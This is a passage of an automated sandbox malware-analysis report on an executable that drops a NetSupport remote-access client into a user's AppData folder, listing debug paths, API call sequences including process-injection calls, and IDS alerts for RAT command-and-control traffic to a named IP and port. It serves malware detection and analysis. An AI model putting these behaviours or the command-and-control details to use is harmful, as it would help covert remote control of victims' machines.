                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000003.00000002.3711407321.0000000070235000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000B.00000002.1372612091.0000000070235000.00000002.00000001.01000000.00000009.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004093B9 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,GetLastError,0_2_004093B9
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040DB4C GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,FindFirstFileW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DB4C
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_022AAFC7 FindFirstFileExW,0_2_022AAFC7
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,3_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF3EFE1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40F84
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6CF3CA9B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40B33
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6CF3C775
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF40702
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF07C6D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6CF3FD86
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3EFE1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40F84
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6CF3CA9B
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40B33
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6CF3C775
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF40702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF40702
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF07C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF07C6D
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3FD86
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,11_2_6CF3DF35
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,11_2_6CF3F8B5
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF3DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,11_2_6CF3DA38
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 4x nop then ret 0_2_004DF11C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 4x nop then add byte ptr [edi], dh3_2_6CEF8468
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 4x nop then add byte ptr [edi], dh11_2_6CEF8468

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49700 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49700 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49974 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49965 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49976 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49975 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49976 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49965 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49977 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49975 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49977 -> 51.89.111.5:1771
                                Source: Network trafficSuricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.7:49974 -> 51.89.111.5:1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
